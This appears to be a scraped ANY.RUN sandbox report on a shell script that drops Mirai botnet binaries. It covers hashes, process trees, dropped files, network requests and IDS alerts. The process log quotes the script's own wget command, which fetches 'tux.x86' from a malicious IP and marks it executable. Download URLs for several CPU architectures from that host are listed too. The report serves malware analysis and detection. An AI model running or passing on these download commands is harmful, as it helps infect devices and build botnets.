File name:

_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh

Full analysis: https://app.any.run/tasks/b4c8f5b7-a550-46c6-a8a9-b25e44ccca11
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: March 14, 2026, 07:35:53
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

F7A5C4491BDAFB2C7F23A7DCADABA33E

SHA1:

F618A6E7710D06B0F483A2CE5C17EF358686520E

SHA256:

0AB70183D671B0A054DEF272C335EE93306E11573E346C59419656F54726AAA1

SSDEEP:

24:mo3h8Lzpxsqpqfe3Q43L2K3b2y3XDj34JU3NIsrt00/BaNYK20:mGeLzXb17xnPI+75sYo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 2000)
      • wget (PID: 2012)
      • wget (PID: 2008)
      • wget (PID: 2004)
      • wget (PID: 2017)
      • wget (PID: 2021)
      • wget (PID: 2013)
      • wget (PID: 2026)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 1982)

    • Uses wget to download content

      • dash (PID: 1986)

    • Potential Corporate Privacy Violation

      • wget (PID: 1994)
      • wget (PID: 2000)
      • wget (PID: 2004)
      • wget (PID: 2021)
      • wget (PID: 2017)
      • wget (PID: 2026)
      • wget (PID: 2013)
      • wget (PID: 2008)

  • INFO

    • Checks timezone

      • wget (PID: 1988)
      • wget (PID: 1994)
      • wget (PID: 2000)
      • wget (PID: 2012)
      • wget (PID: 2004)
      • wget (PID: 2008)
      • wget (PID: 2017)
      • wget (PID: 2013)
      • wget (PID: 2021)
      • wget (PID: 2026)
      • wget (PID: 2034)
      • wget (PID: 2030)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
46
Malicious processes
11
Suspicious processes
0

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs dash no specs locale-check no specs wget systemctl no specs chmod no specs tux.x86 no specs wget tux.x86 tux.x86 no specs tux.x86 no specs tux.x86 no specs chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs #MIRAI wget chmod no specs dash no specs wget chmod no specs dash no specs wget chmod no specs dash no specs

Process information

PID
CMD
Path
Indicators
Parent process
1981/bin/sh -c "sudo chown user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1\.sh && chmod +x /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1\.sh "/usr/bin/dash2EwNpII9hL0vkNEQ
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1982sudo chown user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1983chown user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1984chmod +x /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1985sudo -iu user /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
1986/bin/sh /home/user/Desktop/_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh/usr/bin/dashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
1987/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkdash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
1988wget -q http://88.214.20.14/bins/tux.x86 -O tux.x86/usr/bin/wget
dash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
1989systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libcap.so.2.44
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/lib/x86_64-linux-gnu/liblzma.so.5.2.5
/usr/lib/x86_64-linux-gnu/liblz4.so.1.9.3
/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8
/usr/lib/x86_64-linux-gnu/libblkid.so.1.1.0
/usr/lib/x86_64-linux-gnu/libgcrypt.so.20.3.4
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libgpg-error.so.0.32.1
1990chmod +x tux.x86/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
Executable files
0
Suspicious files
11
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
1988wget/home/user/tux.x86binary
MD5:
SHA256:
1994wget/home/user/tux.mipsbinary
MD5:
SHA256:
2000wget/home/user/tux.mpslbinary
MD5:
SHA256:
2004wget/home/user/tux.armbinary
MD5:
SHA256:
2008wget/home/user/tux.arcbinary
MD5:
SHA256:
2013wget/home/user/tux.arm5binary
MD5:
SHA256:
2017wget/home/user/tux.arm6binary
MD5:
SHA256:
2021wget/home/user/tux.arm7binary
MD5:
SHA256:
2026wget/home/user/tux.ppcbinary
MD5:
SHA256:
2030wget/home/user/tux.m68kbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
23
TCP/UDP connections
44
DNS requests
17
Threats
37

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
POST
200
185.125.188.54:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
GB
unknown
POST
185.125.188.58:443
https://api.snapcraft.io/api/v1/snaps/auth/nonces
GB
POST
200
185.125.188.57:443
https://api.snapcraft.io/v2/snaps/refresh
GB
text
39.3 Kb
unknown
POST
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
GB
binary
39.3 Kb
unknown
GET
204
185.125.190.17:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
GET
185.125.190.17:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
1988
wget
GET
200
88.214.20.14:80
http://88.214.20.14/bins/tux.x86
DE
binary
76.8 Kb
unknown
1994
wget
GET
200
88.214.20.14:80
http://88.214.20.14/bins/tux.mips
DE
binary
110 Kb
unknown
2000
wget
GET
200
88.214.20.14:80
http://88.214.20.14/bins/tux.mpsl
DE
binary
114 Kb
unknown
2004
wget
GET
200
88.214.20.14:80
http://88.214.20.14/bins/tux.arm
DE
binary
89.1 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
456
avahi-daemon
224.0.0.251:5353
whitelisted
79.127.216.203:443
odrs.gnome.org
CDN77 _
GB
whitelisted
185.125.190.17:80
connectivity-check.ubuntu.com
CANONICAL-AS
GB
whitelisted
195.181.170.18:443
odrs.gnome.org
CDN77 _
GB
whitelisted
185.125.188.59:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
185.125.188.57:443
api.snapcraft.io
CANONICAL-AS
GB
whitelisted
1988
wget
88.214.20.14:80
XTOM xTom GmbH
DE
malicious
1992
tux.x86
64.89.161.130:44300
GHOSTYNETWORKS
US
unknown
1994
wget
88.214.20.14:80
XTOM xTom GmbH
DE
malicious
2000
wget
88.214.20.14:80
XTOM xTom GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 79.127.216.203
  • 195.181.170.18
  • 195.181.175.40
  • 79.127.211.89
  • 212.102.56.178
  • 37.19.194.80
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c77a::48
  • 2a02:6ea0:c77a::47
  • 2a02:6ea0:c700::101
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.54
  • 185.125.188.58
  • 185.125.188.57
  • 2620:2d:4000:1010::3da
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2cc
  • 2620:2d:4000:1010::42
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.17
  • 91.189.91.97
  • 185.125.190.98
  • 185.125.190.48
  • 91.189.91.96
  • 91.189.91.49
  • 91.189.91.48
  • 185.125.190.49
  • 91.189.91.98
  • 185.125.190.97
  • 185.125.190.18
  • 185.125.190.96
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2001:67c:1562::24
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
  • 2001:67c:1562::23
  • 2620:2d:4000:1::96
whitelisted
google.com
  • 142.251.127.100
  • 142.251.127.139
  • 142.251.127.102
  • 142.251.127.101
  • 142.251.127.113
  • 142.251.127.138
  • 2a00:1450:4001:80d::200e
whitelisted
10.100.168.192.in-addr.arpa
whitelisted
ntp.ubuntu.com
  • 91.189.91.157
  • 185.125.190.56
  • 185.125.190.57
  • 185.125.190.58
  • 2620:2d:4000:1::40
  • 2620:2d:4000:1::41
  • 2620:2d:4000:1::3f
whitelisted

Threats

PID
Process
Class
Message
1988
wget
Potentially Bad Traffic
ET INFO x86 File Download Request from IP Address
1988
wget
Potentially Bad Traffic
ET HUNTING Suspicious GET Request for .x86
1988
wget
A Network Trojan was detected
BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (x86)
1994
wget
A Network Trojan was detected
AV INFO Possible Mirai .mips Executable Download
1994
wget
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
1988
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
1994
wget
A Network Trojan was detected
BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (mips)
1994
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
2000
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
2000
wget
A Network Trojan was detected
BOTNET [ANY.RUN] Linux/Mirai ELF-file download via wget (mpsl)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_0ab70183d671b0a054def272c335ee93306e11573e346c59419656f54726aaa1.sh